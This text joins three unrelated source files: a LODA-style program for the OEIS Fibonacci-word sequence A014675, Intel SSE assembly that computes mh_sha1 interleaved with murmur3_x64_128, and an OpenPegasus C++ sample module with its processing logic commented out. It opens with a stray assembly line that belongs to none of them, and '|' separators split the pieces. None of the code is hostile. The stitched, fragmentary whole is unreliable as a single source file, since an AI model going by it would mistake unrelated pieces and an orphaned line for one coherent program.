jalr r0 r31 ; jump back to the return address, discarding the link in r0
; A014675: The infinite Fibonacci word (start with 1, apply 1->2, 2->21, take limit).
; 2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2
mov $9,$0
mov $11,2
lpb $11,1
clr $0,9
mov $0,$9
sub $11,1
add $0,$11
sub $0,1
mov $4,$0
add $4,2
add $7,5
mul $7,$4
div $4,18
sub $7,1
sub $7,$4
div $7,8
mov $1,$7
mov $12,$11
lpb $12,1
mov $10,$1
sub $12,1
lpe
lpe
lpb $9,1
mov $9,0
sub $10,$1
lpe
mov $1,$10
add $1,1
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Copyright(c) 2011-2016 Intel Corporation All rights reserved.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions
; are met:
; * Redistributions of source code must retain the above copyright
; notice, this list of conditions and the following disclaimer.
; * Redistributions in binary form must reproduce the above copyright
; notice, this list of conditions and the following disclaimer in
; the documentation and/or other materials provided with the
; distribution.
; * Neither the name of Intel Corporation nor the names of its
; contributors may be used to endorse or promote products derived
; from this software without specific prior written permission.
;
; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
; "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
; LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
; A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
; OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
; SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
; LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
; DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
; THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
; (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; code to compute 16-segment mh_sha1 interleaved with murmur3_x64_128 using SSE
;;
%include "reg_sizes.asm"
default rel
;; Magic functions defined in FIPS 180-1
;;
; macro MAGIC_F0 F,B,C,D,T ;; F = (D ^ (B & (C ^ D)))
%macro MAGIC_F0 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
movdqa %%regF,%%regC
pxor %%regF,%%regD
pand %%regF,%%regB
pxor %%regF,%%regD
%endmacro
; macro MAGIC_F1 F,B,C,D,T ;; F = (B ^ C ^ D)
%macro MAGIC_F1 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
movdqa %%regF,%%regD
pxor %%regF,%%regC
pxor %%regF,%%regB
%endmacro
; macro MAGIC_F2 F,B,C,D,T ;; F = ((B & C) | (B & D) | (C & D))
%macro MAGIC_F2 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
movdqa %%regF,%%regB
movdqa %%regT,%%regB
por %%regF,%%regC
pand %%regT,%%regC
pand %%regF,%%regD
por %%regF,%%regT
%endmacro
; macro MAGIC_F3 F,B,C,D,T ;; F = (B ^ C ^ D)
%macro MAGIC_F3 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
MAGIC_F1 %%regF,%%regB,%%regC,%%regD,%%regT
%endmacro
; PROLD reg, imm, tmp
%macro PROLD 3
%define %%reg %1
%define %%imm %2
%define %%tmp %3
movdqa %%tmp, %%reg
pslld %%reg, %%imm
psrld %%tmp, (32-%%imm)
por %%reg, %%tmp
%endmacro
%macro SHA1_STEP_00_15 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
paddd %%regE,[%%data + (%%memW * 16)]
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%macro SHA1_STEP_16_79 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
movdqa %%regF, W16
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
;; Insert murmur3's instructions into these macros.
;; Every segs_loop of mh_sha1 calls SHA1_STEP_16_79 64 times and processes 256 bytes,
;; so 1 murmur3 block (16 bytes) is spread across every 4 SHA1_STEP_16_79 steps.
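;; For reference, the four macro variants below together interleave one full
;; murmur3_x64_128 block round with the SHA1 steps; in C-like pseudocode
;; (k1/k2 = the two input qwords, h1/h2 = running hashes, constants as %defined):
;;   k1 *= C1; k1 = rotl64(k1, R1); k1 *= C2; h1 ^= k1;
;;   h1 = rotl64(h1, R3); h1 += h2; h1 = h1*M + N1;
;;   k2 *= C2; k2 = rotl64(k2, R2); k2 *= C1; h2 ^= k2;
;;   h2 = rotl64(h2, R4); h2 += h1; h2 = h2*M + N2;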
%define SHA1_STEP_16_79(J) SHA1_STEP_16_79_ %+ J
%macro SHA1_STEP_16_79_0 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
movdqa %%regF, W16
mov mur_data1, [mur_in_p]
mov mur_data2, [mur_in_p + 8]
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
imul mur_data1, mur_c1_r
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
imul mur_data2, mur_c2_r
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
%macro SHA1_STEP_16_79_1 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
rol mur_data1, R1
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
movdqa %%regF, W16
pslld W16, 1
rol mur_data2, R2
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
imul mur_data1, mur_c2_r
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
imul mur_data2, mur_c1_r
PROLD %%regB,30, %%regT
add mur_in_p, 16
paddd %%regE,%%regF
%endmacro
%macro SHA1_STEP_16_79_2 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
xor mur_hash1, mur_data1
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
rol mur_hash1, R3
movdqa %%regF, W16
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
add mur_hash1, mur_hash2
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
lea mur_hash1, [mur_hash1 + mur_hash1*4 + N1]
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
%macro SHA1_STEP_16_79_3 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
xor mur_hash2, mur_data2
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
rol mur_hash2, R4
movdqa %%regF, W16
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
add mur_hash2, mur_hash1
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
lea mur_hash2, [mur_hash2 + mur_hash2*4 + N2]
paddd %%regE,%%regF
%endmacro
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%ifidn __OUTPUT_FORMAT__, elf64
; Linux
%define arg0 rdi
%define arg1 rsi
%define arg2 rdx
%define arg3 rcx
%define arg4 r8d
%define arg5 r9
%define tmp1 r10
%define tmp2 r11
%define tmp3 r12 ; must be saved and restored
%define tmp4 r13 ; must be saved and restored
%define tmp5 r14 ; must be saved and restored
%define tmp6 r15 ; must be saved and restored
%define tmp7 rbx ; must be saved and restored
%define tmp8 rbp ; must be saved and restored
%define return rax
%define func(x) x:
%macro FUNC_SAVE 0
push r12
push r13
push r14
push r15
push rbx
push rbp
%endmacro
%macro FUNC_RESTORE 0
pop rbp
pop rbx
pop r15
pop r14
pop r13
pop r12
%endmacro
%else
; Windows
%define arg0 rcx
%define arg1 rdx
%define arg2 r8
%define arg3 r9
%define arg4 r10d
%define arg5 r11
%define tmp1 r12 ; must be saved and restored
%define tmp2 r13 ; must be saved and restored
%define tmp3 r14 ; must be saved and restored
%define tmp4 r15 ; must be saved and restored
%define tmp5 rdi ; must be saved and restored
%define tmp6 rsi ; must be saved and restored
%define tmp7 rbx ; must be saved and restored
%define tmp8 rbp ; must be saved and restored
%define return rax
%define stack_size 10*16 + 9*8 ; must be an odd multiple of 8
%define PS 8
%define arg(x) [rsp + stack_size + PS + PS*x]
%define func(x) proc_frame x
%macro FUNC_SAVE 0
alloc_stack stack_size
save_xmm128 xmm6, 0*16
save_xmm128 xmm7, 1*16
save_xmm128 xmm8, 2*16
save_xmm128 xmm9, 3*16
save_xmm128 xmm10, 4*16
save_xmm128 xmm11, 5*16
save_xmm128 xmm12, 6*16
save_xmm128 xmm13, 7*16
save_xmm128 xmm14, 8*16
save_xmm128 xmm15, 9*16
save_reg r12, 10*16 + 0*8
save_reg r13, 10*16 + 1*8
save_reg r14, 10*16 + 2*8
save_reg r15, 10*16 + 3*8
save_reg rdi, 10*16 + 4*8
save_reg rsi, 10*16 + 5*8
save_reg rbx, 10*16 + 6*8
save_reg rbp, 10*16 + 7*8
end_prolog
mov arg4, arg(4)
%endmacro
%macro FUNC_RESTORE 0
movdqa xmm6, [rsp + 0*16]
movdqa xmm7, [rsp + 1*16]
movdqa xmm8, [rsp + 2*16]
movdqa xmm9, [rsp + 3*16]
movdqa xmm10, [rsp + 4*16]
movdqa xmm11, [rsp + 5*16]
movdqa xmm12, [rsp + 6*16]
movdqa xmm13, [rsp + 7*16]
movdqa xmm14, [rsp + 8*16]
movdqa xmm15, [rsp + 9*16]
mov r12, [rsp + 10*16 + 0*8]
mov r13, [rsp + 10*16 + 1*8]
mov r14, [rsp + 10*16 + 2*8]
mov r15, [rsp + 10*16 + 3*8]
mov rdi, [rsp + 10*16 + 4*8]
mov rsi, [rsp + 10*16 + 5*8]
mov rbx, [rsp + 10*16 + 6*8]
mov rbp, [rsp + 10*16 + 7*8]
add rsp, stack_size
%endmacro
%endif
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%define loops arg4
;variables of mh_sha1
%define mh_in_p arg0
%define mh_digests_p arg1
%define mh_data_p arg2
%define mh_segs tmp1
;variables of murmur3
%define mur_in_p tmp2
%define mur_digest_p arg3
%define mur_hash1 tmp3
%define mur_hash2 tmp4
%define mur_data1 tmp5
%define mur_data2 return
%define mur_c1_r tmp6
%define mur_c2_r arg5
; constants of murmur3_x64_128
%define R1 31
%define R2 33
%define R3 27
%define R4 31
%define M 5
%define N1 0x52dce729;DWORD
%define N2 0x38495ab5;DWORD
%define C1 QWORD(0x87c37b91114253d5)
%define C2 QWORD(0x4cf5ad432745937f)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;variables used by storing segs_digests on stack
%define RSP_SAVE tmp7
%define FRAMESZ 4*5*16 ;BYTES*DWORDS*SEGS
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%define MOVPS movups
%define A xmm0
%define B xmm1
%define C xmm2
%define D xmm3
%define E xmm4
%define F xmm5 ; tmp
%define G xmm6 ; tmp
%define TMP G
%define FUN F
%define K xmm7
%define AA xmm8
%define BB xmm9
%define CC xmm10
%define DD xmm11
%define EE xmm12
%define T0 xmm6
%define T1 xmm7
%define T2 xmm8
%define T3 xmm9
%define T4 xmm10
%define T5 xmm11
%macro ROTATE_ARGS 0
%xdefine TMP_ E
%xdefine E D
%xdefine D C
%xdefine C B
%xdefine B A
%xdefine A TMP_
%endm
%define W14 xmm13
%define W15 xmm14
%define W16 xmm15
%macro ROTATE_W 0
%xdefine TMP_ W16
%xdefine W16 W15
%xdefine W15 W14
%xdefine W14 TMP_
%endm
;init hash digests
; segs_digests:low addr-> high_addr
; a | b | c | ...| p | (16)
; h0 | h0 | h0 | ...| h0 | | Aa| Ab | Ac |...| Ap |
; h1 | h1 | h1 | ...| h1 | | Ba| Bb | Bc |...| Bp |
; ....
; h5 | h5 | h5 | ...| h5 | | Ea| Eb | Ec |...| Ep |
align 32
;void mh_sha1_murmur3_x64_128_block_sse (const uint8_t * input_data,
; uint32_t mh_sha1_digests[SHA1_DIGEST_WORDS][HASH_SEGS],
; uint8_t frame_buffer[MH_SHA1_BLOCK_SIZE],
; uint32_t murmur3_x64_128_digests[MURMUR3_x64_128_DIGEST_WORDS],
; uint32_t num_blocks);
; arg 0 pointer to input data
; arg 1 pointer to digests, include segments digests(uint32_t digests[16][5])
; arg 2 pointer to aligned_frame_buffer which is used to save the big_endian data.
; arg 3 pointer to murmur3 digest
; arg 4 number of 1KB blocks
;
mk_global mh_sha1_murmur3_x64_128_block_sse, function, internal
func(mh_sha1_murmur3_x64_128_block_sse)
FUNC_SAVE
; save rsp
mov RSP_SAVE, rsp
cmp loops, 0
jle .return
; leave enough space to store segs_digests
sub rsp, FRAMESZ
; align rsp to 16 Bytes needed by sse
and rsp, ~0x0F
%assign I 0 ; copy segs_digests into stack
%rep 5
MOVPS A, [mh_digests_p + I*64 + 16*0]
MOVPS B, [mh_digests_p + I*64 + 16*1]
MOVPS C, [mh_digests_p + I*64 + 16*2]
MOVPS D, [mh_digests_p + I*64 + 16*3]
movdqa [rsp + I*64 + 16*0], A
movdqa [rsp + I*64 + 16*1], B
movdqa [rsp + I*64 + 16*2], C
movdqa [rsp + I*64 + 16*3], D
%assign I (I+1)
%endrep
;init murmur variables
mov mur_in_p, mh_in_p ;murmur and mh_sha1 step through the input at different rates, so murmur keeps its own pointer
;load murmur hash digests and multiplier
mov mur_hash1, [mur_digest_p]
mov mur_hash2, [mur_digest_p + 8]
mov mur_c1_r, C1
mov mur_c2_r, C2
.block_loop:
;transform to big-endian data and store on aligned_frame
movdqa F, [PSHUFFLE_BYTE_FLIP_MASK]
;transform input data from DWORD*16_SEGS*5 to DWORD*4_SEGS*5*4
%assign I 0
%rep 16
MOVPS T0,[mh_in_p+I*64+0*16]
MOVPS T1,[mh_in_p+I*64+1*16]
MOVPS T2,[mh_in_p+I*64+2*16]
MOVPS T3,[mh_in_p+I*64+3*16]
pshufb T0, F
movdqa [mh_data_p+(I)*16 +0*256],T0
pshufb T1, F
movdqa [mh_data_p+(I)*16 +1*256],T1
pshufb T2, F
movdqa [mh_data_p+(I)*16 +2*256],T2
pshufb T3, F
movdqa [mh_data_p+(I)*16 +3*256],T3
%assign I (I+1)
%endrep
mov mh_segs, 0 ;start from the first 4 segments
.segs_loop:
;; Initialize digests
movdqa A, [rsp + 0*64 + mh_segs]
movdqa B, [rsp + 1*64 + mh_segs]
movdqa C, [rsp + 2*64 + mh_segs]
movdqa D, [rsp + 3*64 + mh_segs]
movdqa E, [rsp + 4*64 + mh_segs]
movdqa AA, A
movdqa BB, B
movdqa CC, C
movdqa DD, D
movdqa EE, E
;;
;; perform 0-79 steps
;;
movdqa K, [K00_19]
;; do rounds 0...15
%assign I 0
%rep 16
SHA1_STEP_00_15 A,B,C,D,E, TMP,FUN, I, K, MAGIC_F0, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 16...19
movdqa W16, [mh_data_p + ((16 - 16) & 15) * 16]
movdqa W15, [mh_data_p + ((16 - 15) & 15) * 16]
%rep 4
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F0, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 20...39
movdqa K, [K20_39]
%rep 20
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F1, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 40...59
movdqa K, [K40_59]
%rep 20
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F2, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 60...79
movdqa K, [K60_79]
%rep 20
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F3, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
paddd A, AA
paddd B, BB
paddd C, CC
paddd D, DD
paddd E, EE
; write out digests
movdqa [rsp + 0*64 + mh_segs], A
movdqa [rsp + 1*64 + mh_segs], B
movdqa [rsp + 2*64 + mh_segs], C
movdqa [rsp + 3*64 + mh_segs], D
movdqa [rsp + 4*64 + mh_segs], E
add mh_data_p, 256
add mh_segs, 16
cmp mh_segs, 64
jc .segs_loop
sub mh_data_p, (1024)
add mh_in_p, (1024)
sub loops, 1
jne .block_loop
;store murmur-hash digest
mov [mur_digest_p], mur_hash1
mov [mur_digest_p + 8], mur_hash2
%assign I 0 ; copy segs_digests back to mh_digests_p
%rep 5
movdqa A, [rsp + I*64 + 16*0]
movdqa B, [rsp + I*64 + 16*1]
movdqa C, [rsp + I*64 + 16*2]
movdqa D, [rsp + I*64 + 16*3]
MOVPS [mh_digests_p + I*64 + 16*0], A
MOVPS [mh_digests_p + I*64 + 16*1], B
MOVPS [mh_digests_p + I*64 + 16*2], C
MOVPS [mh_digests_p + I*64 + 16*3], D
%assign I (I+1)
%endrep
mov rsp, RSP_SAVE ; restore rsp
.return:
FUNC_RESTORE
ret
endproc_frame
section .data align=16
align 16
PSHUFFLE_BYTE_FLIP_MASK: dq 0x0405060700010203, 0x0c0d0e0f08090a0b
K00_19: dq 0x5A8279995A827999, 0x5A8279995A827999
K20_39: dq 0x6ED9EBA16ED9EBA1, 0x6ED9EBA16ED9EBA1
K40_59: dq 0x8F1BBCDC8F1BBCDC, 0x8F1BBCDC8F1BBCDC
K60_79: dq 0xCA62C1D6CA62C1D6, 0xCA62C1D6CA62C1D6
|
//%2005////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2000, 2001, 2002 BMC Software; Hewlett-Packard Development
// Company, L.P.; IBM Corp.; The Open Group; Tivoli Systems.
// Copyright (c) 2003 BMC Software; Hewlett-Packard Development Company, L.P.;
// IBM Corp.; EMC Corporation, The Open Group.
// Copyright (c) 2004 BMC Software; Hewlett-Packard Development Company, L.P.;
// IBM Corp.; EMC Corporation; VERITAS Software Corporation; The Open Group.
// Copyright (c) 2005 Hewlett-Packard Development Company, L.P.; IBM Corp.;
// EMC Corporation; VERITAS Software Corporation; The Open Group.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to
// deal in the Software without restriction, including without limitation the
// rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
// sell copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// THE ABOVE COPYRIGHT NOTICE AND THIS PERMISSION NOTICE SHALL BE INCLUDED IN
// ALL COPIES OR SUBSTANTIAL PORTIONS OF THE SOFTWARE. THE SOFTWARE IS PROVIDED
// "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
// LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
// HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
//
//==============================================================================
//
// Author: Sushma Fernandes, Hewlett-Packard Company
// (sushma_fernandes@hp.com)
//
//%/////////////////////////////////////////////////////////////////////////////
#include "SampleSSPModule.h"
PEGASUS_USING_STD;
PEGASUS_NAMESPACE_BEGIN
static const String _REQUIRED_QUAL_NAME = "Required";
SampleSSPModule::SampleSSPModule()
{
}
SampleSSPModule::~SampleSSPModule()
{
}
/**
Performs special processing on a qualifier declaration.
@param inputQual the qualifier declaration to process.
@param outputQual the updated qualifier declaration.
@return true if processing succeeded.
*/
Boolean SampleSSPModule::processQualifier (CIMQualifierDecl& inputQual,
CIMQualifierDecl& outputQual)
{
return true;
}
/**
Interface for special processing on a class.
*/
Boolean SampleSSPModule::processClass (CIMClass& inputClass,
CIMClass& outputClass)
{
/* This is a sample implementation to update a CIM Class
Uncomment for implementation
//
// Check if the input class defines "Required" qualifier and
// if the flavor on the qualifier is set to OVERRIDABLE.
// If true unset it in the output class.
//
Uint32 count = inputClass.getQualifierCount();
for ( Uint32 i = 0; i < count; i++ )
{
CIMQualifier q = inputClass.getQualifier(i);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor( CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
outputClass.removeQualifier(i);
outputClass.addQualifier(q);
}
}
}
//
// Check if any property defines "Required" qualifier.
//
Array<CIMProperty> cimProperty;
for ( Uint32 i = 0; i < inputClass.getPropertyCount(); i++ )
{
CIMProperty p = inputClass.getProperty(i);
Uint32 qualCount = p.getQualifierCount();
for ( Uint32 qctr = 0; qctr < qualCount; qctr++)
{
CIMQualifier q = p.getQualifier(qctr);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor(
CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
p.removeQualifier(qctr);
p.addQualifier(q);
cimProperty.append(p);
break;
}
}
}
}
for ( Uint32 i=0; i<cimProperty.size(); i++)
{
Uint32 pos = outputClass.findProperty(cimProperty[i].getName());
outputClass.removeProperty(pos);
outputClass.addProperty (cimProperty[i]);
}
//
// Check if any Method defines "Required" qualifier.
//
for ( Uint32 i = 0; i < inputClass.getMethodCount(); i++ )
{
CIMMethod m = inputClass.getMethod (i);
Uint32 qualCount = m.getQualifierCount();
for ( Uint32 qctr = 0; qctr < qualCount; qctr++)
{
CIMQualifier q = m.getQualifier(qctr);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor(
CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
outputClass.removeMethod (i);
outputClass.addMethod (m);
}
break;
}
}
}
//
// Check if any Method parameter defines
// "Required" qualifier.
//
for ( Uint32 i = 0; i < inputClass.getMethodCount(); i++ )
{
CIMMethod m = inputClass.getMethod (i);
// Check the method parameters.
Boolean methodChanged = false;
Uint32 paramCount = m.getParameterCount();
for ( Uint32 pctr = 0; pctr < paramCount; pctr++)
{
CIMParameter p1 = m.getParameter(pctr);
Uint32 pqCount = p1.getQualifierCount();
for ( Uint32 pqctr = 0; pqctr < pqCount; pqctr++)
{
CIMQualifier q = p1.getQualifier(pqctr);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor
( CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
methodChanged = true;
p1.removeQualifier(pqctr);
p1.addQualifier (q);
m.removeParameter(pctr);
m.addParameter(p1);
}
break;
}
}
}
if ( methodChanged)
{
outputClass.removeMethod (i);
outputClass.addMethod (m);
}
}
Uncomment for implementation */
return true;
}
/**
Interface for special processing on an instance.
*/
Boolean SampleSSPModule::processInstance (CIMInstance& inputInstance,
CIMInstance& outputInstance)
{
/* This is a sample implementation to update a CIM Instance.
Uncomment for implementation
Array<CIMProperty> cimProperty;
//
// Check if the input instance defines "Required" qualifier and
// if the flavor on the qualifier is set to OVERRIDABLE.
// If true unset it in the output instance.
//
for ( Uint32 i = 0; i < inputInstance.getPropertyCount(); i++ )
{
CIMProperty p = inputInstance.getProperty (i);
Uint32 qualCount = p.getQualifierCount();
for ( Uint32 qctr = 0; qctr < qualCount; qctr++)
{
CIMQualifier q = p.getQualifier(qctr);
if ( q.getName() == _REQUIRED_QUAL_NAME)
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor(
CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
p.removeQualifier(qctr);
p.addQualifier(q);
cimProperty.append(p);
}
break;
}
}
}
for ( Uint32 i=0; i<cimProperty.size(); i++)
{
outputInstance.removeProperty(
outputInstance.findProperty (cimProperty[i].getName()));
outputInstance.addProperty (cimProperty[i]);
}
Uncomment for implementation */
return true;
}
